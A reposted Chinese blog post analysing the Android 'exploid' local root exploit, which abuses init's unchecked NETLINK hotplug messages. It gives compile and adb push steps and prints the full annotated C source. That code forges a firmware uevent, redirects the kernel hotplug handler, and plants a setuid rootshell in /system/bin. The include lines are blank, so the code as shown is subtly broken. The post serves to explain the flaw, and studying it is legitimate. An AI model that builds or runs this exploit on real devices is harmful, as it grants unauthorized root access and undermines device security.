android代码剖析root,【转】Android root源代码剖析

最新推荐文章于 2023-05-09 21:47:01 发布
最新推荐文章于 2023-05-09 21:47:01 发布
阅读量247 收藏 1
点赞数 1
文章标签: android代码剖析root

linux系统由udev提供系统设备的管理,比如提供热拔插usb设备等等。而Android把udev的工作移交给init进程。而linux中版本号小于1.4.1的udev不会检查是由内核还是用户发送热拔插信息。因此用户可以发送恶意的信息让内核加载定义的恶意程序从而取得root权限。该代码如下。

程序执行的顺序用(1)序号标明了。

通过在 http://www.codesourcery.com/sgpp/lite/arm/portal/release1803 下载编译工具

通过arm-none-eabi-gcc exploid.c -static -o exploid 编译

adb push exploid /data/local/tmp 目录中执行即可root

提权之后rootshell是一个权限为04711的属于root的可执行程序,普通用户也可以运行该程序,由于S位置位,当普通用户执行该程序时有效用户ID为root,从而可以运行root用户才能执行的程序和操作,从而提权成功。

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

#include

int main(int argc, char **argv, char **env)

{

char buf[512], path[512];

int ofd;

struct sockaddr_nl snl;

struct iovec iov = {buf, sizeof(buf)};

//(1)初始化要发送的数据,通过NET_LINK机制(参见man 手册,可以与内核实现近似于套接字的通信方式)发送

struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0};

int sock;

char *basedir = NULL;

/* I hope there is no LD_ bug in androids rtld :) */

//(11)root后执行rootshell则执行该步,直接创建一个有root权限的shell

if (geteuid() == 0 && getuid() != 0)

rootshell(env);

//(2)获取程序的路径,为/data/local/tmp/exploid

if (readlink("/proc/self/exe", path, sizeof(path)) < 0)

die("[-] readlink");

if (geteuid() == 0) {

//(9)有内核加载热拔插固件时再次执行该应用,此时有效id为为0,有root权限

clear_hotplug();

/* remount /system rw */

//(10)拷贝自己到/system/bin/目录下成为rootshell,并改变sh的文件属性

remount_system("/system");

if (copy(path, "/system/bin/rootshell") != 0)

chmod("/system/bin/sh", 04755);

else

chmod("/system/bin/rootshell", 04711);

for (;;)

sleep(3);

}

printf("[*] Android local root exploid (C) The Android Exploid Crew\n");

//(3)改变工作目录,没有root权限,只可以在少数目录执行

basedir = "/sqlite_stmt_journals";

if (chdir(basedir) < 0) {

basedir = "/data/local/tmp";

if (chdir(basedir) < 0)

basedir = strdup(getcwd(buf, sizeof(buf)));

}

printf("[+] Using basedir=%s, path=%s\n", basedir, path);

printf("[+] opening NETLINK_KOBJECT_UEVENT socket\n");

memset(&snl, 0, sizeof(snl));

snl.nl_pid = 1;

snl.nl_family = AF_NETLINK;

//(4)构建一个NETLINK的套接字

if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0)

die("[-] socket");

//(5)创建要热拔插的文件,其中hotplug文件中存储的为/data/local/tmp/exploid

close(creat("loading", 0666));

if ((ofd = creat("hotplug", 0644)) < 0)

die("[-] creat");

if (write(ofd, path , strlen(path)) < 0)

die("[-] write");

close(ofd);

//(6)建立一个data文件,为指向系统的hotplug的符号链接

symlink("/proc/sys/kernel/hotplug", "data");

//(7)构建发送给内核的信息,内容为进行热拔插,固件位置在/data/local/tmp/hotplug

snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c"

"SUBSYSTEM=firmware%c"

"FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0);

printf("[+] sending add message ...\n");

//(8)发送该信息

if (sendmsg(sock, &msg, 0) < 0)

die("[-] sendmsg");

close(sock);

printf("[*] Try to invoke hotplug now, clicking at the wireless\n"

"[*] settings, plugin USB key etc.\n"

"[*] You succeeded if you find /system/bin/rootshell.\n"

"[*] GUI might hang/restart meanwhile so be patient.\n");

sleep(3);

return 0;

}

void die(const char *msg)

{

perror(msg);

exit(errno);

}

int copy(const char *from, const char *to)

{

int fd1, fd2;

char buf[0x1000];

int r = 0;

if ((fd1 = open(from, O_RDONLY)) < 0)

return -1;

if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0) {

close(fd1);

return -1;

}

for (;;) {

r = read(fd1, buf, sizeof(buf));

if (r <= 0)

break;

if (write(fd2, buf, r) != r)

break;

}

close(fd1);

close(fd2);

sync(); sync();

return r;

}

void clear_hotplug()

{

int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC);

write(ofd, "", 1);

close(ofd);

}

void rootshell(char **env)

{

char *sh[] = {"/system/bin/sh", 0};

// AID_SHELL

if (getuid() != 2000)

die("[-] Permission denied.");

setuid(0); setgid(0);

execve(*sh, sh, env);

die("[-] execve");

}

int remount_system(const char *mntpoint)

{

FILE *f = NULL;

int found = 0;

char buf[1024], *dev = NULL, *fstype = NULL;

if ((f = fopen("/proc/mounts", "r")) == NULL)

return -1;

memset(buf, 0, sizeof(buf));

for (;!feof(f);) {

if (fgets(buf, sizeof(buf), f) == NULL)

break;

if (strstr(buf, mntpoint)) {

found = 1;

break;

}

}

fclose(f);

if (!found)

return -1;

if ((dev = strtok(buf, " \t")) == NULL)

return -1;

if (strtok(NULL, " \t") == NULL)

return -1;

if ((fstype = strtok(NULL, " \t")) == NULL)

return -1;

return mount(dev, mntpoint, fstype, MS_REMOUNT, 0);

}

姜秀萍
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
android手机一键root源码
08-16
一键获取手机ROOT源码程序分享给大家。
android root相关代码
liushengdi110的专栏
05-06 943
或者build/make/target/product/base_system.mk。,注释用户组权限检测。
android代码剖析root,Android root源代码剖析
weixin_39653320的博客
05-27 177
linux系统由udev提供系统设备的管理,比如提供热拔插usb设备等等。而Android把udev的工作移交给init进程。而linux中版本号小于1.4.1的udev不会检查是由内核还是用户发送热拔插信息。因此用户可以发送恶意的信息让内核加载定义的恶意程序从而取得root权限。该代码如下。程序执行的顺序用(1)序号标明了。通过在 http://www.codesourcery.com/sgpp...
安卓ROOT权限代码
u014486555的博客
12-02 1062
package com.linin.utils;   import java.io.DataInputStream; import java.io.DataOutputStream; import java.io.IOException;   /**  * root权限工具类  *  * @author li
Android应用源码获取root权限静默安装
07-29
这是一个获取root权限后,不弹出系统安装界面,直接进行安装的的源码。代码只有一个MainActivity,看起来相对比较容易,代码中重要部分都已加入详细的注释,方便大家阅读。不过应用程序运行命令获取ROOT权限,设备必须已破解(获得ROOT权限),代码中主要对流进行操作,有对文件读写不清楚的都可以看看。(源码采用GBK编码)。之前也介绍过一个静默卸载的项目http://www./source/6484.html和一个静默安装的http://www./source/8340.html。感兴趣自己去研究吧。
Superuser源代码 - 保护Android设备上的Root权限
03-16
**Superuser源代码详解——构建Android设备上的Root权限管理** 在Android系统中,"Root"权限是最高级别的管理员权限,允许用户访问系统的核心组件和进行深度定制。然而,这种权限的滥用可能导致系统的不稳定甚至...
Android例子源码免root实现截屏
03-16
项目中的code文件夹很可能包含了实现上述功能的Java源代码。主要涉及的类可能有Activity(包含Button点击事件处理),BroadcastReceiver(用于接收截图完成的广播),以及可能的Util类(用于文件操作和Intent构建)...
Android代码-FileExplorer
08-07
**Android代码-FileExplorer** FileExplorer是一款基于Android平台的文件管理器应用,它是一个开源项目,最初来源于https://github.com/MiCode/FileExplorer。这款应用旨在帮助用户在Android设备上轻松浏览、操作和...
Android代码-AutoInstall
08-06
标题"Android代码-AutoInstall"和描述"Android 无需Root实现APK的静默安装"所提及的就是这个主题。我们将探讨如何在Android系统中实现这种功能,以及相关的技术细节。 首先,静默安装在Android系统中通常涉及到使用...
Android代码-Uninstaller
08-06
7. **源代码分析**:在提供的`Uninstaller-master`压缩包中,很可能是包含了对Android系统卸载过程的源代码实现或者一个模拟卸载功能的工具。开发者可以通过阅读和研究这些代码,了解卸载过程的细节,甚至可以自定义...
Android应用程序请求root权限代码
03-05
android应用启动时弹窗请求root权限
Android代码-[root] Wifi Key View
08-06
Wifi Key View for Android (root required) No ads. No unnecessary permissions. Clear style. Open-source. This app displays all the wireless passwords and their associated name (SSID) stored on your android device. Supported wireless profiles: WEP (including key index) WPA / WPA2 PSK 802.1x (including username and password) Click on a profile to copy the wireless key to clipboard, or hold to get more options (like share or copy SSID to clipboard). This app should work with all Android Versions
AndroidRoot权限获取的简单代码
09-05
那么我们在Android开发中如何获取AndroidRoot权限呢?下面是主要的简单代码
Android修改源码让APP获取root权限可以执行su命令的git diff记录
08-30
修改源码让APP获取root权限可以执行su命令的git diff记录
android5.1_root_patch
10-20
android 5.1源码root补丁 不需要SuperSU,使用android su
Android修改源码实现root
最新发布
weixin_57780394的博客
05-09 410
原文链接:https://blog.csdn.net/weixin_43245753/article/details/123040578。版权声明:本文为CSDN博主「loitawu」的原创文章,遵循CC 4.0 BY-SA版权协议,载请附上原文出处链接及本声明。4. 给 su 文件默认授予 root 权限。3. 修改su.cpp,注释用户组权限检测。1. userdebug和user版本。5. user版本需要把su编进系统。本方法适用于所有Android版本。2. 关闭selinux。
Android 请求Root权限代码
applek_Case的博客
03-08 2820
安卓系统的权限系统和PHP权限是一样的,并且除了sdcard目录,其他的目录要想读写,都需要权限,特别是系统文件夹,必须赋予777最高权限才能读写。下载是如何请求root权限的代码root.javaimport java.io.DataOutputStream; public class root { public static boolean upgradeRootPermissio...
android获取root代码,Android获取ROOT权限的实例代码
weixin_39551611的博客
05-26 1375
获取androidroot权限其实很简单,只要在runtime下执行命令"su"就可以了。// 获取root权限public void get_root(){if (is_root()){toast.maketext(mctx, "已经具有root权限!", toast.length_long).show();}else{try{progress_dialog = progressdialog....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值